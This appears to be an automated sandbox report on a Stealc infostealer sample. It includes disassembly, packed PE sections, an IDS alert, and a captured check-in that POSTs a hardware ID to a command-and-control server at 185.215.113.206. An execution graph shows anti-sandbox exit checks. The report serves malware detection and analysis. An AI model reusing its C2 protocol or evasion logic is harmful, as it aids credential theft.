                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [0000000Ah], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx], al
                                        add byte ptr [eax], 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        pop es
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+0Ah], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        or byte ptr [eax+00000000h], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add ecx, dword ptr [edx]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        xor byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+00000000h], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        or byte ptr [eax+00000000h], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add ecx, dword ptr [edx]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        xor byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        sub byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax+00000000h], eax
                                        add byte ptr [eax], al

                                        Rich Headers

                                        Programming Language:
                                        • [C++] VS2010 build 30319
                                        • [ASM] VS2010 build 30319
                                        • [ C ] VS2010 build 30319
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [LNK] VS2010 build 30319

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        0x10000x25b0000x228008f4a1bb8484b365f335ea4b296c25d0funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        0x25e0000x2990000x20034462465f111153475a46e3b883381a6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        nnbmymfp0x4f70000x1990000x198e00c817282c2be4edccccec0b28efe5f2e3False0.9949252187786609data7.953989385913713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        onazwdcw0x6900000x10000x4009f216bfb69e08aeb1094fcd49d7a9ceaFalse0.7958984375data6.15350017974742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .taggant0x6910000x30000x22006f72d93e8e4aca903e55335a1cb80973False0.05905330882352941DOS executable (COM)0.7354567351322978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                        Imports

                                        DLLImport
                                        kernel32.dlllstrcpy

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-26T07:11:01.630432+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649709185.215.113.20680TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 26, 2024 07:11:00.351252079 CEST4970980192.168.2.6185.215.113.206
                                        Oct 26, 2024 07:11:00.356709003 CEST8049709185.215.113.206192.168.2.6
                                        Oct 26, 2024 07:11:00.356800079 CEST4970980192.168.2.6185.215.113.206
                                        Oct 26, 2024 07:11:00.357438087 CEST4970980192.168.2.6185.215.113.206
                                        Oct 26, 2024 07:11:00.362725973 CEST8049709185.215.113.206192.168.2.6
                                        Oct 26, 2024 07:11:01.327523947 CEST8049709185.215.113.206192.168.2.6
                                        Oct 26, 2024 07:11:01.327637911 CEST4970980192.168.2.6185.215.113.206
                                        Oct 26, 2024 07:11:01.331181049 CEST4970980192.168.2.6185.215.113.206
                                        Oct 26, 2024 07:11:01.336597919 CEST8049709185.215.113.206192.168.2.6
                                        Oct 26, 2024 07:11:01.630204916 CEST8049709185.215.113.206192.168.2.6
                                        Oct 26, 2024 07:11:01.630431890 CEST4970980192.168.2.6185.215.113.206
                                        Oct 26, 2024 07:11:04.065927029 CEST4970980192.168.2.6185.215.113.206

                                        HTTP Request Dependency Graph

                                        • 185.215.113.206

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.649709185.215.113.206803184C:\Users\user\Desktop\file.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 26, 2024 07:11:00.357438087 CEST90OUTGET / HTTP/1.1
                                        Host: 185.215.113.206
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Oct 26, 2024 07:11:01.327523947 CEST203INHTTP/1.1 200 OK
                                        Date: Sat, 26 Oct 2024 05:11:01 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Oct 26, 2024 07:11:01.331181049 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI
                                        Host: 185.215.113.206
                                        Content-Length: 210
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 38 41 41 38 34 45 41 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a
                                        Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="hwid"C8E8AA84EA5B340779059------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build"puma------DGHJECAFIDAFHJKFCGHI--
                                        Oct 26, 2024 07:11:01.630204916 CEST210INHTTP/1.1 200 OK
                                        Date: Sat, 26 Oct 2024 05:11:01 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 8
                                        Keep-Alive: timeout=5, max=99
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                        Data Ascii: YmxvY2s=


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:01:10:56
                                        Start date:26/10/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0xe90000
                                        File size:1'830'912 bytes
                                        MD5 hash:23F03176DDC56B4E531545AAF7394334
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:7.5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:10.1%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:24
                                          execution_graph 13431 ea69f0 13476 e92260 13431->13476 13455 ea6a64 13456 eaa9b0 4 API calls 13455->13456 13457 ea6a6b 13456->13457 13458 eaa9b0 4 API calls 13457->13458 13459 ea6a72 13458->13459 13460 eaa9b0 4 API calls 13459->13460 13461 ea6a79 13460->13461 13462 eaa9b0 4 API calls 13461->13462 13463 ea6a80 13462->13463 13628 eaa8a0 13463->13628 13465 ea6b0c 13632 ea6920 GetSystemTime 13465->13632 13467 ea6a89 13467->13465 13469 ea6ac2 OpenEventA 13467->13469 13471 ea6ad9 13469->13471 13472 ea6af5 CloseHandle Sleep 13469->13472 13475 ea6ae1 CreateEventA 13471->13475 13474 ea6b0a 13472->13474 13474->13467 13475->13465 13829 e945c0 13476->13829 13478 e92274 13479 e945c0 2 API calls 13478->13479 13480 e9228d 13479->13480 13481 e945c0 2 API calls 13480->13481 13482 e922a6 13481->13482 13483 e945c0 2 API calls 13482->13483 13484 e922bf 13483->13484 13485 e945c0 2 API calls 13484->13485 13486 e922d8 13485->13486 13487 e945c0 2 API calls 13486->13487 13488 e922f1 13487->13488 13489 e945c0 2 API calls 13488->13489 13490 e9230a 13489->13490 13491 e945c0 2 API calls 13490->13491 13492 e92323 13491->13492 13493 e945c0 2 API calls 13492->13493 13494 e9233c 13493->13494 13495 e945c0 2 API calls 13494->13495 13496 e92355 13495->13496 13497 e945c0 2 API calls 13496->13497 13498 e9236e 13497->13498 13499 e945c0 2 API calls 13498->13499 13500 e92387 13499->13500 13501 e945c0 2 API calls 13500->13501 13502 e923a0 13501->13502 13503 e945c0 2 API calls 13502->13503 13504 e923b9 13503->13504 13505 e945c0 2 API calls 13504->13505 13506 e923d2 13505->13506 13507 e945c0 2 API calls 13506->13507 13508 e923eb 13507->13508 13509 e945c0 2 API calls 13508->13509 13510 e92404 13509->13510 13511 e945c0 2 API calls 13510->13511 13512 e9241d 13511->13512 13513 e945c0 2 API calls 13512->13513 13514 e92436 13513->13514 13515 e945c0 2 API calls 13514->13515 13516 e9244f 13515->13516 13517 e945c0 2 API calls 13516->13517 13518 e92468 13517->13518 13519 e945c0 2 API calls 13518->13519 13520 e92481 13519->13520 13521 e945c0 2 API calls 13520->13521 13522 e9249a 13521->13522 13523 e945c0 2 API calls 13522->13523 13524 e924b3 13523->13524 13525 e945c0 2 API calls 13524->13525 13526 e924cc 13525->13526 13527 e945c0 2 API calls 13526->13527 13528 e924e5 13527->13528 13529 e945c0 2 API calls 13528->13529 13530 e924fe 13529->13530 13531 e945c0 2 API calls 13530->13531 13532 e92517 13531->13532 13533 e945c0 2 API calls 13532->13533 13534 e92530 13533->13534 13535 e945c0 2 API calls 13534->13535 13536 e92549 13535->13536 13537 e945c0 2 API calls 13536->13537 13538 e92562 13537->13538 13539 e945c0 2 API calls 13538->13539 13540 e9257b 13539->13540 13541 e945c0 2 API calls 13540->13541 13542 e92594 13541->13542 13543 e945c0 2 API calls 13542->13543 13544 e925ad 13543->13544 13545 e945c0 2 API calls 13544->13545 13546 e925c6 13545->13546 13547 e945c0 2 API calls 13546->13547 13548 e925df 13547->13548 13549 e945c0 2 API calls 13548->13549 13550 e925f8 13549->13550 13551 e945c0 2 API calls 13550->13551 13552 e92611 13551->13552 13553 e945c0 2 API calls 13552->13553 13554 e9262a 13553->13554 13555 e945c0 2 API calls 13554->13555 13556 e92643 13555->13556 13557 e945c0 2 API calls 13556->13557 13558 e9265c 13557->13558 13559 e945c0 2 API calls 13558->13559 13560 e92675 13559->13560 13561 e945c0 2 API calls 13560->13561 13562 e9268e 13561->13562 13563 ea9860 13562->13563 13834 ea9750 GetPEB 13563->13834 13565 ea9868 13566 ea987a 13565->13566 13567 ea9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13565->13567 13570 ea988c 21 API calls 13566->13570 13568 ea9b0d 13567->13568 13569 ea9af4 GetProcAddress 13567->13569 13571 ea9b46 13568->13571 13572 ea9b16 GetProcAddress GetProcAddress 13568->13572 13569->13568 13570->13567 13573 ea9b68 13571->13573 13574 ea9b4f GetProcAddress 13571->13574 13572->13571 13575 ea9b89 13573->13575 13576 ea9b71 GetProcAddress 13573->13576 13574->13573 13577 ea9b92 GetProcAddress GetProcAddress 13575->13577 13578 ea6a00 13575->13578 13576->13575 13577->13578 13579 eaa740 13578->13579 13580 eaa750 13579->13580 13581 ea6a0d 13580->13581 13582 eaa77e lstrcpy 13580->13582 13583 e911d0 13581->13583 13582->13581 13584 e911e8 13583->13584 13585 e9120f ExitProcess 13584->13585 13586 e91217 13584->13586 13587 e91160 GetSystemInfo 13586->13587 13588 e9117c ExitProcess 13587->13588 13589 e91184 13587->13589 13590 e91110 GetCurrentProcess VirtualAllocExNuma 13589->13590 13591 e91149 13590->13591 13592 e91141 ExitProcess 13590->13592 13835 e910a0 VirtualAlloc 13591->13835 13595 e91220 13839 ea89b0 13595->13839 13598 e91249 13599 e9129a 13598->13599 13600 e91292 ExitProcess 13598->13600 13601 ea6770 GetUserDefaultLangID 13599->13601 13602 ea6792 13601->13602 13603 ea67d3 13601->13603 13602->13603 13604 ea67cb ExitProcess 13602->13604 13605 ea67ad ExitProcess 13602->13605 13606 ea67a3 ExitProcess 13602->13606 13607 ea67c1 ExitProcess 13602->13607 13608 ea67b7 ExitProcess 13602->13608 13609 e91190 13603->13609 13604->13603 13610 ea78e0 3 API calls 13609->13610 13611 e9119e 13610->13611 13612 e911cc 13611->13612 13613 ea7850 3 API calls 13611->13613 13616 ea7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13612->13616 13614 e911b7 13613->13614 13614->13612 13615 e911c4 ExitProcess 13614->13615 13617 ea6a30 13616->13617 13618 ea78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13617->13618 13619 ea6a43 13618->13619 13620 eaa9b0 13619->13620 13841 eaa710 13620->13841 13622 eaa9c1 lstrlen 13624 eaa9e0 13622->13624 13623 eaaa18 13842 eaa7a0 13623->13842 13624->13623 13626 eaa9fa lstrcpy lstrcat 13624->13626 13626->13623 13627 eaaa24 13627->13455 13630 eaa8bb 13628->13630 13629 eaa90b 13629->13467 13630->13629 13631 eaa8f9 lstrcpy 13630->13631 13631->13629 13846 ea6820 13632->13846 13634 ea698e 13635 ea6998 sscanf 13634->13635 13875 eaa800 13635->13875 13637 ea69aa SystemTimeToFileTime SystemTimeToFileTime 13638 ea69e0 13637->13638 13640 ea69ce 13637->13640 13641 ea5b10 13638->13641 13639 ea69d8 ExitProcess 13640->13638 13640->13639 13642 ea5b1d 13641->13642 13643 eaa740 lstrcpy 13642->13643 13644 ea5b2e 13643->13644 13877 eaa820 lstrlen 13644->13877 13647 eaa820 2 API calls 13648 ea5b64 13647->13648 13649 eaa820 2 API calls 13648->13649 13650 ea5b74 13649->13650 13881 ea6430 13650->13881 13653 eaa820 2 API calls 13654 ea5b93 13653->13654 13655 eaa820 2 API calls 13654->13655 13656 ea5ba0 13655->13656 13657 eaa820 2 API calls 13656->13657 13658 ea5bad 13657->13658 13659 eaa820 2 API calls 13658->13659 13660 ea5bf9 13659->13660 13890 e926a0 13660->13890 13668 ea5cc3 13669 ea6430 lstrcpy 13668->13669 13670 ea5cd5 13669->13670 13671 eaa7a0 lstrcpy 13670->13671 13672 ea5cf2 13671->13672 13673 eaa9b0 4 API calls 13672->13673 13674 ea5d0a 13673->13674 13675 eaa8a0 lstrcpy 13674->13675 13676 ea5d16 13675->13676 13677 eaa9b0 4 API calls 13676->13677 13678 ea5d3a 13677->13678 13679 eaa8a0 lstrcpy 13678->13679 13680 ea5d46 13679->13680 13681 eaa9b0 4 API calls 13680->13681 13682 ea5d6a 13681->13682 13683 eaa8a0 lstrcpy 13682->13683 13684 ea5d76 13683->13684 13685 eaa740 lstrcpy 13684->13685 13686 ea5d9e 13685->13686 14616 ea7500 GetWindowsDirectoryA 13686->14616 13689 eaa7a0 lstrcpy 13690 ea5db8 13689->13690 14626 e94880 13690->14626 13692 ea5dbe 14771 ea17a0 13692->14771 13694 ea5dc6 13695 eaa740 lstrcpy 13694->13695 13696 ea5de9 13695->13696 13697 e91590 lstrcpy 13696->13697 13698 ea5dfd 13697->13698 14787 e95960 13698->14787 13700 ea5e03 14931 ea1050 13700->14931 13702 ea5e0e 13703 eaa740 lstrcpy 13702->13703 13704 ea5e32 13703->13704 13705 e91590 lstrcpy 13704->13705 13706 ea5e46 13705->13706 13707 e95960 34 API calls 13706->13707 13708 ea5e4c 13707->13708 14935 ea0d90 13708->14935 13710 ea5e57 13711 eaa740 lstrcpy 13710->13711 13712 ea5e79 13711->13712 13713 e91590 lstrcpy 13712->13713 13714 ea5e8d 13713->13714 13715 e95960 34 API calls 13714->13715 13716 ea5e93 13715->13716 14942 ea0f40 13716->14942 13718 ea5e9e 13719 e91590 lstrcpy 13718->13719 13720 ea5eb5 13719->13720 14947 ea1a10 13720->14947 13722 ea5eba 13723 eaa740 lstrcpy 13722->13723 13724 ea5ed6 13723->13724 15291 e94fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13724->15291 13726 ea5edb 13727 e91590 lstrcpy 13726->13727 13728 ea5f5b 13727->13728 15298 ea0740 13728->15298 13730 ea5f60 13731 eaa740 lstrcpy 13730->13731 13732 ea5f86 13731->13732 13733 e91590 lstrcpy 13732->13733 13734 ea5f9a 13733->13734 13735 e95960 34 API calls 13734->13735 13736 ea5fa0 13735->13736 13830 e945d1 RtlAllocateHeap 13829->13830 13832 e94621 VirtualProtect 13830->13832 13832->13478 13834->13565 13837 e910c2 codecvt 13835->13837 13836 e910fd 13836->13595 13837->13836 13838 e910e2 VirtualFree 13837->13838 13838->13836 13840 e91233 GlobalMemoryStatusEx 13839->13840 13840->13598 13841->13622 13843 eaa7c2 13842->13843 13844 eaa7ec 13843->13844 13845 eaa7da lstrcpy 13843->13845 13844->13627 13845->13844 13847 eaa740 lstrcpy 13846->13847 13848 ea6833 13847->13848 13849 eaa9b0 4 API calls 13848->13849 13850 ea6845 13849->13850 13851 eaa8a0 lstrcpy 13850->13851 13852 ea684e 13851->13852 13853 eaa9b0 4 API calls 13852->13853 13854 ea6867 13853->13854 13855 eaa8a0 lstrcpy 13854->13855 13856 ea6870 13855->13856 13857 eaa9b0 4 API calls 13856->13857 13858 ea688a 13857->13858 13859 eaa8a0 lstrcpy 13858->13859 13860 ea6893 13859->13860 13861 eaa9b0 4 API calls 13860->13861 13862 ea68ac 13861->13862 13863 eaa8a0 lstrcpy 13862->13863 13864 ea68b5 13863->13864 13865 eaa9b0 4 API calls 13864->13865 13866 ea68cf 13865->13866 13867 eaa8a0 lstrcpy 13866->13867 13868 ea68d8 13867->13868 13869 eaa9b0 4 API calls 13868->13869 13870 ea68f3 13869->13870 13871 eaa8a0 lstrcpy 13870->13871 13872 ea68fc 13871->13872 13873 eaa7a0 lstrcpy 13872->13873 13874 ea6910 13873->13874 13874->13634 13876 eaa812 13875->13876 13876->13637 13878 eaa83f 13877->13878 13879 ea5b54 13878->13879 13880 eaa87b lstrcpy 13878->13880 13879->13647 13880->13879 13882 eaa8a0 lstrcpy 13881->13882 13883 ea6443 13882->13883 13884 eaa8a0 lstrcpy 13883->13884 13885 ea6455 13884->13885 13886 eaa8a0 lstrcpy 13885->13886 13887 ea6467 13886->13887 13888 eaa8a0 lstrcpy 13887->13888 13889 ea5b86 13888->13889 13889->13653 13891 e945c0 2 API calls 13890->13891 13892 e926b4 13891->13892 13893 e945c0 2 API calls 13892->13893 13894 e926d7 13893->13894 13895 e945c0 2 API calls 13894->13895 13896 e926f0 13895->13896 13897 e945c0 2 API calls 13896->13897 13898 e92709 13897->13898 13899 e945c0 2 API calls 13898->13899 13900 e92736 13899->13900 13901 e945c0 2 API calls 13900->13901 13902 e9274f 13901->13902 13903 e945c0 2 API calls 13902->13903 13904 e92768 13903->13904 13905 e945c0 2 API calls 13904->13905 13906 e92795 13905->13906 13907 e945c0 2 API calls 13906->13907 13908 e927ae 13907->13908 13909 e945c0 2 API calls 13908->13909 13910 e927c7 13909->13910 13911 e945c0 2 API calls 13910->13911 13912 e927e0 13911->13912 13913 e945c0 2 API calls 13912->13913 13914 e927f9 13913->13914 13915 e945c0 2 API calls 13914->13915 13916 e92812 13915->13916 13917 e945c0 2 API calls 13916->13917 13918 e9282b 13917->13918 13919 e945c0 2 API calls 13918->13919 13920 e92844 13919->13920 13921 e945c0 2 API calls 13920->13921 13922 e9285d 13921->13922 13923 e945c0 2 API calls 13922->13923 13924 e92876 13923->13924 13925 e945c0 2 API calls 13924->13925 13926 e9288f 13925->13926 13927 e945c0 2 API calls 13926->13927 13928 e928a8 13927->13928 13929 e945c0 2 API calls 13928->13929 13930 e928c1 13929->13930 13931 e945c0 2 API calls 13930->13931 13932 e928da 13931->13932 13933 e945c0 2 API calls 13932->13933 13934 e928f3 13933->13934 13935 e945c0 2 API calls 13934->13935 13936 e9290c 13935->13936 13937 e945c0 2 API calls 13936->13937 13938 e92925 13937->13938 13939 e945c0 2 API calls 13938->13939 13940 e9293e 13939->13940 13941 e945c0 2 API calls 13940->13941 13942 e92957 13941->13942 13943 e945c0 2 API calls 13942->13943 13944 e92970 13943->13944 13945 e945c0 2 API calls 13944->13945 13946 e92989 13945->13946 13947 e945c0 2 API calls 13946->13947 13948 e929a2 13947->13948 13949 e945c0 2 API calls 13948->13949 13950 e929bb 13949->13950 13951 e945c0 2 API calls 13950->13951 13952 e929d4 13951->13952 13953 e945c0 2 API calls 13952->13953 13954 e929ed 13953->13954 13955 e945c0 2 API calls 13954->13955 13956 e92a06 13955->13956 13957 e945c0 2 API calls 13956->13957 13958 e92a1f 13957->13958 13959 e945c0 2 API calls 13958->13959 13960 e92a38 13959->13960 13961 e945c0 2 API calls 13960->13961 13962 e92a51 13961->13962 13963 e945c0 2 API calls 13962->13963 13964 e92a6a 13963->13964 13965 e945c0 2 API calls 13964->13965 13966 e92a83 13965->13966 13967 e945c0 2 API calls 13966->13967 13968 e92a9c 13967->13968 13969 e945c0 2 API calls 13968->13969 13970 e92ab5 13969->13970 13971 e945c0 2 API calls 13970->13971 13972 e92ace 13971->13972 13973 e945c0 2 API calls 13972->13973 13974 e92ae7 13973->13974 13975 e945c0 2 API calls 13974->13975 13976 e92b00 13975->13976 13977 e945c0 2 API calls 13976->13977 13978 e92b19 13977->13978 13979 e945c0 2 API calls 13978->13979 13980 e92b32 13979->13980 13981 e945c0 2 API calls 13980->13981 13982 e92b4b 13981->13982 13983 e945c0 2 API calls 13982->13983 13984 e92b64 13983->13984 13985 e945c0 2 API calls 13984->13985 13986 e92b7d 13985->13986 13987 e945c0 2 API calls 13986->13987 13988 e92b96 13987->13988 13989 e945c0 2 API calls 13988->13989 13990 e92baf 13989->13990 13991 e945c0 2 API calls 13990->13991 13992 e92bc8 13991->13992 13993 e945c0 2 API calls 13992->13993 13994 e92be1 13993->13994 13995 e945c0 2 API calls 13994->13995 13996 e92bfa 13995->13996 13997 e945c0 2 API calls 13996->13997 13998 e92c13 13997->13998 13999 e945c0 2 API calls 13998->13999 14000 e92c2c 13999->14000 14001 e945c0 2 API calls 14000->14001 14002 e92c45 14001->14002 14003 e945c0 2 API calls 14002->14003 14004 e92c5e 14003->14004 14005 e945c0 2 API calls 14004->14005 14006 e92c77 14005->14006 14007 e945c0 2 API calls 14006->14007 14008 e92c90 14007->14008 14009 e945c0 2 API calls 14008->14009 14010 e92ca9 14009->14010 14011 e945c0 2 API calls 14010->14011 14012 e92cc2 14011->14012 14013 e945c0 2 API calls 14012->14013 14014 e92cdb 14013->14014 14015 e945c0 2 API calls 14014->14015 14016 e92cf4 14015->14016 14017 e945c0 2 API calls 14016->14017 14018 e92d0d 14017->14018 14019 e945c0 2 API calls 14018->14019 14020 e92d26 14019->14020 14021 e945c0 2 API calls 14020->14021 14022 e92d3f 14021->14022 14023 e945c0 2 API calls 14022->14023 14024 e92d58 14023->14024 14025 e945c0 2 API calls 14024->14025 14026 e92d71 14025->14026 14027 e945c0 2 API calls 14026->14027 14028 e92d8a 14027->14028 14029 e945c0 2 API calls 14028->14029 14030 e92da3 14029->14030 14031 e945c0 2 API calls 14030->14031 14032 e92dbc 14031->14032 14033 e945c0 2 API calls 14032->14033 14034 e92dd5 14033->14034 14035 e945c0 2 API calls 14034->14035 14036 e92dee 14035->14036 14037 e945c0 2 API calls 14036->14037 14038 e92e07 14037->14038 14039 e945c0 2 API calls 14038->14039 14040 e92e20 14039->14040 14041 e945c0 2 API calls 14040->14041 14042 e92e39 14041->14042 14043 e945c0 2 API calls 14042->14043 14044 e92e52 14043->14044 14045 e945c0 2 API calls 14044->14045 14046 e92e6b 14045->14046 14047 e945c0 2 API calls 14046->14047 14048 e92e84 14047->14048 14049 e945c0 2 API calls 14048->14049 14050 e92e9d 14049->14050 14051 e945c0 2 API calls 14050->14051 14052 e92eb6 14051->14052 14053 e945c0 2 API calls 14052->14053 14054 e92ecf 14053->14054 14055 e945c0 2 API calls 14054->14055 14056 e92ee8 14055->14056 14057 e945c0 2 API calls 14056->14057 14058 e92f01 14057->14058 14059 e945c0 2 API calls 14058->14059 14060 e92f1a 14059->14060 14061 e945c0 2 API calls 14060->14061 14062 e92f33 14061->14062 14063 e945c0 2 API calls 14062->14063 14064 e92f4c 14063->14064 14065 e945c0 2 API calls 14064->14065 14066 e92f65 14065->14066 14067 e945c0 2 API calls 14066->14067 14068 e92f7e 14067->14068 14069 e945c0 2 API calls 14068->14069 14070 e92f97 14069->14070 14071 e945c0 2 API calls 14070->14071 14072 e92fb0 14071->14072 14073 e945c0 2 API calls 14072->14073 14074 e92fc9 14073->14074 14075 e945c0 2 API calls 14074->14075 14076 e92fe2 14075->14076 14077 e945c0 2 API calls 14076->14077 14078 e92ffb 14077->14078 14079 e945c0 2 API calls 14078->14079 14080 e93014 14079->14080 14081 e945c0 2 API calls 14080->14081 14082 e9302d 14081->14082 14083 e945c0 2 API calls 14082->14083 14084 e93046 14083->14084 14085 e945c0 2 API calls 14084->14085 14086 e9305f 14085->14086 14087 e945c0 2 API calls 14086->14087 14088 e93078 14087->14088 14089 e945c0 2 API calls 14088->14089 14090 e93091 